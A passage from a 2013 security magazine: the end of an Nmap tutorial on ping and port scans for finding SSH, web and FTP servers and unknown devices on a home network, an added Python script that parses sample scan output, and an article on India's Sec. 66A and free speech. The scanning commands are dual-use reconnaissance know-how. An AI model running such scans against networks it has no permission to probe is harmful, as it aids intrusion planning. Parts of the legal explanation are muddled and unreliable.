If you want to keep your nmap scanning output simple you can use the –open parameter which helps you to display only the open ports on your target.Sometimes is hard to remember all these commands and to do the job right you can use the –A parameter, which can be used to perform an aggressive scan. This parameter selects some of the most commonly options used with Nmap. Now that we have learned the basics of Nmaplet me takesome examples. Example 1 I want to know if there is any SSH or web server in my subnet. The most popular ports for SSH and web servers are 22 and 80 so we need to use the --open parameter to check only for

File transfer protocol (FTP) is known for its weak security. The issue with file transfer protocol is that all the traffic is sent in plain text meaning that all data can be easily intercepted. An Nmap scan can helps us to identify ftp servers. The command syntax for this scan is ―nmap -sP -p 21 [target/CIDR]‖. Example 3 How to tell if your wireless router has been ―hacked‖ Most wireless routers allow administration through a web page interface. Open a web browser and connect to your router by typing in its IP address. The default IP set for many routers is 192.168.0.1 or 192.168.1.1. If you are not sure about your router‘s IP open the command prompt, type ―ipconfig‖ and then press enter. This command gives you information about the


Issue36 – Jan2013 | Page - 22

internet connection. The IP address under "Default Gateway" should be your router's IP. After you have entered the router's IP address in the web browser, a pop-up window will ask for your username and password. Enter them to log into your router. Search through the administrative menus that your router offers and try to find the page that shows a list of devices using the network. Figure 8 shows all devices connected to my network. Now it is very easy, isn't it? If the page shows more DHCP clients than you have, it means that your wireless router has been compromised and you should immediately improve its security.

Figure 8

But how can you tell if your wireless router has been "hacked" if you are not the administrator of the router? Nmap does the magic for us. We learned to perform a simple ping scan of a subnet by using the -sP option. If the command result displays more hosts than you expect, it means that your router has been "hacked". Figure 9 shows the output of my simple ping scan.

Figure 9

Figure 9 shows that 2 hosts are up. One of these hosts is my computer and the other one is my router. If the scan shows more than two hosts up, it means that someone is using my wireless network.

Conclusion
We've looked at the basics we need to know about Nmap. In the next tutorial we'll take a look at more advanced stuff and use Nmap in real world examples.
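The three examples in this tutorial all end with a person reading Nmap's screen output and counting hosts or ports by eye. The script below is an added illustration, not code from the tutorial or from the Nmap project: it shows how the same three checks (which hosts are up, which hosts expose a given port, and whether more hosts answered than the owner expects) can be automated from Nmap's grepable output (-oG), the format Nmap provides for parsing. The scan output embedded in the script is constructed sample data in the shape that "nmap -sn -oG -" (-sn is the current name of the -sP ping scan) and "nmap -p 21,22,80 --open -oG -" print; the addresses and the owner's list of known devices are invented.

```python
"""Triage of Nmap grepable (-oG) output for a home subnet.

Added example, not from the tutorial. Parses constructed sample lines in the
shape of `nmap -sn -oG -` and `nmap -p 21,22,80 --open -oG -` output.
"""
import re
from typing import Dict, List, Set

# Constructed sample: what a ping scan of 192.168.1.0/24 could print with -oG.
SAMPLE_PING_SCAN = """\
# Nmap scan initiated (constructed sample, not a real scan)
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.7 ()\tStatus: Up
Host: 192.168.1.23 ()\tStatus: Up
# Nmap done (constructed sample) -- 256 IP addresses (3 hosts up)
"""

# Constructed sample: a port scan of the same subnet with -p 21,22,80 --open.
SAMPLE_PORT_SCAN = """\
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http///\tIgnored State: closed (2)
Host: 192.168.1.7 ()\tStatus: Up
Host: 192.168.1.7 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///
Host: 192.168.1.23 ()\tStatus: Up
Host: 192.168.1.23 ()\tPorts: 21/open/tcp//ftp///
"""

# -oG host lines look like: "Host: <ip> (<hostname>)\t<field>: <value>..."
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s*(.*)$")


def hosts_up(grepable: str) -> List[str]:
    """Return the IPs marked 'Status: Up', in scan order (Example 3)."""
    up = []
    for line in grepable.splitlines():
        m = HOST_RE.match(line)
        if m and "Status: Up" in m.group(3):
            up.append(m.group(1))
    return up


def open_ports(grepable: str) -> Dict[str, Set[int]]:
    """Map each host to the set of port numbers reported as open."""
    result: Dict[str, Set[int]] = {}
    for line in grepable.splitlines():
        m = HOST_RE.match(line)
        if not m or "Ports:" not in m.group(3):
            continue
        # The Ports field ends at the next tab-separated field (if any).
        ports_field = m.group(3).split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            # Each entry is port/state/protocol/owner/service/rpc/version/
            fields = entry.strip().split("/")
            if len(fields) >= 2 and fields[1] == "open":
                result.setdefault(m.group(1), set()).add(int(fields[0]))
    return result


def hosts_with_port(grepable: str, port: int) -> List[str]:
    """Hosts exposing the given open port, e.g. 22 for SSH (Examples 1 and 2)."""
    return sorted(h for h, ports in open_ports(grepable).items() if port in ports)


def unexpected_hosts(grepable: str, known: Set[str]) -> List[str]:
    """Hosts that answered the ping scan but are not on the owner's list."""
    return sorted(set(hosts_up(grepable)) - known)


if __name__ == "__main__":
    # The owner knows only the router and one laptop; 192.168.1.23 is a surprise.
    known_devices = {"192.168.1.1", "192.168.1.7"}
    print("hosts up:      ", hosts_up(SAMPLE_PING_SCAN))
    print("SSH servers:   ", hosts_with_port(SAMPLE_PORT_SCAN, 22))
    print("web servers:   ", hosts_with_port(SAMPLE_PORT_SCAN, 80))
    print("FTP servers:   ", hosts_with_port(SAMPLE_PORT_SCAN, 21))
    print("unexpected:    ", unexpected_hosts(SAMPLE_PING_SCAN, known_devices))
```

The same functions can be pointed at a real scan saved with -oG. Treat an unexpected host as something to investigate rather than as proof that the router has been compromised: a phone, printer or smart TV the owner forgot about shows up in the ping scan exactly the same way as an intruder, which is why keeping the list of known devices current matters as much as the scan itself.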

Oltjano Terpollari
terpollarioltjano@hotmail.com
Oltjano is pursuing Computer Engineering at the Polytechnic University of Tirana. He is passionate about Information Security, Computer Forensics and game development.



Offensiveness and Freedom of Speech – A Comparative Study of our Rights and Duties in the Digital World

"Freedom of speech does not protect you from the consequences of saying stupid shit." ― Jim C. Hines

Yes, you have guessed it right: this is with reference to current happenings around us. Although I had written in one of the earlier editions about Sec. 66A, my intention behind writing this article is to give readers a fair idea of the legal status in India of the burning issue of freedom of speech and expression, and of rights in the digital world.

Recent incidents

Anti-corruption cartoonist Aseem Trivedi arrested on sedition charges
Aseem Trivedi was exhibiting his political cartoons against corruption at the anti-corruption protest at the MMRDA grounds when his website was suspended by Crime Branch, Mumbai, and he was arrested on the counts of sedition under Sec. 124 (A) of the Indian Penal Code, Sec. 66A of the Information Technology Act and under the National Emblem Act, 1971.
http://indiatoday.intoday.in/story/anticorruption-cartoonist-aseem-trivediarrested-on-seditioncharges/1/216643.html

Industrialist held for "offensive" tweet on Chidambaram's son
An industrialist was arrested on Tuesday on charges of posting "offensive remarks" against Union finance minister P Chidambaram's son Karti Chidambaram on the micro-blogging site Twitter. S Ravi, 46, who runs a packaging unit at Sederapet Industrial Estate in Puducherry, in a tweet on October 19 alleged that Karti had "amassed" more wealth than Robert Vadra, UPA chairperson Sonia Gandhi's son-in-law. In another tweet on the same day, he said "as a Tamilian" he felt "bad to have sent P Chidambaram to national politics". Ravi has been actively participating in events organized by India Against Corruption (IAC) in Puducherry.
http://articles.timesofindia.indiatimes.com/2012-1031/india/34836084_1_puducherrydefamation-suit-union-territory

Two girls in Palghar were arrested over a remark posted on Facebook following Shiv Sena supremo Bal Thackeray's death
Police on Sunday arrested a 21-year-old girl for questioning, on her Facebook account, the total shutdown in the city for Bal Thackeray's funeral. Another girl who 'liked' the comment was also arrested. The duo was booked under Section 295 (a) of the IPC (for hurting religious sentiments) and Section 64 (a) of the Information Technology Act, 2000. Though the girl withdrew her comment and apologised, a mob of some 2,000 Shiv Sena workers attacked and ransacked her uncle's orthopedic clinic at Palghar. Her comment said "People like Thackeray are born and die daily and one should not observe a bandh for that."
http://timesofindia.indiatimes.com/city/mumbai/Facebook-arrests-Relief-forPalghar-girls-on-thecards/articleshow/17394827.cms

Legal stand
I have covered this topic in four parts in order to simplify things:
1. Definition and explanation of Sec. 66A of the IT Act;
2. Meaning of the term 'offensive';
3. Meaning of the term Freedom of Speech and Expression guaranteed under the Constitution of India; and
4. Test of Balance of Convenience.

Sec. 66A reads as –
Any person who sends, by means of a computer resource or a communication device,—
a) any information that is grossly offensive or has menacing character; or
b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device;
c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment – Imprisonment for a term which may extend to three years and with fine.
Explanation — For the purpose of this section, the terms "electronic mail" and "electronic mail message" mean a message or information created or transmitted or received on a computer, computer system, computer resource or communication device including attachments in text, images, audio, video and any other electronic record, which may be transmitted with the message.

The section covers two different acts:
1. Sending offensive or menacing messages by using electronic communication means; and
2. Sending false messages with intent to cheat, mislead or deceive people or to cause annoyance.
While proving a false message is relatively easy, the real question is 'What constitutes an electronic message to be offensive or of menacing character?'

What constitutes offensiveness?
The term 'offensive' has not been defined by Indian law. The Oxford English Dictionary defines the word 'offensive' as – causing someone to feel deeply hurt, upset, or angry. In criminal law it is necessary to prove that the person had mens rea, i.e. a guilty mind, behind doing a particular act in order to prove that person's guilt. Hence it can be said that 'offensive' is a relative term and its interpretation varies from person to person.

Freedom of Speech and Expression
Article 19 of the Constitution of India defines Freedom of Speech and Expression as –

(The entire Article is not covered due to limitation of space. You can refer to the Constitution of India for the same.)

Art. 19 – Protection of certain rights regarding freedom of speech etc.
1. All citizens shall have the right
a) to freedom of speech and expression;
b) to assemble peaceably and without arms;
c) to form associations or unions;
d) to move freely throughout the territory of India;
e) to reside and settle in any part of the territory of India; and
f) omitted
g) to practise any profession, or to carry on any occupation, trade or business.
The aforementioned rights are given subject to reasonable restrictions and considering the laws, rules and regulations made by the central or state government. The Supreme Court of India has from time to time said that freedom of speech and expression is not absolute.

Test of Balance of Convenience
It means an objective test applied by the courts to each party's circumstances to establish who is more inconvenienced with having to travel to court. This test of balance of convenience is very critical in interpreting the provisions regarding offensiveness, and it is important to note that in some of the recent incidents of arrest the situation prevailing at the site demanded immediate action from the Police in order to avoid worsening of the situation (I am not defending the Police here).



Conclusion
To conclude, I remember this famous quote by George Washington – "If freedom of speech is taken away, then dumb and silent we may be led, like sheep to the slaughter." But while enjoying our fundamental and constitutional rights, we must not forget the fundamental duties given by the same Constitution. As the intention behind this article is to highlight the legal provisions for our rights, I also intend to enumerate our fundamental duties here. As citizens of India it is expected that we use our rights keeping in mind our duties and respect the spirit of our Constitution.

Article 51A – Fundamental Duties
It shall be the duty of every citizen of India:
a) to abide by the Constitution and respect its ideals and institutions, the National Flag and the National Anthem;
b) to cherish and follow the noble ideals which inspired our national struggle for freedom;
c) to uphold and protect the sovereignty, unity and integrity of India;
d) to defend the country and render national service when called upon to do so;
e) to promote harmony and the spirit of common brotherhood amongst all the people of India transcending religious, linguistic and regional or sectional diversities; to renounce practices derogatory to the dignity of women;
f) to value and preserve the rich heritage of our composite culture;
g) to protect and improve the natural environment including forests, lakes, rivers and wild life, and to have compassion for living creatures;
h) to develop the scientific temper, humanism and the spirit of inquiry and reform;
i) to safeguard public property and to abjure violence;
j) to strive towards excellence in all spheres of individual and collective activity so that the nation constantly rises to higher levels of endeavor and achievement.

Sagar Rahurkar
Sagar Rahurkar is a Master of Law, a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in Cyber Laws, Fraud Examination, and Intellectual Property Law related issues. He has co-authored a book titled "Introduction to Cyber Crimes and Cyber Law".

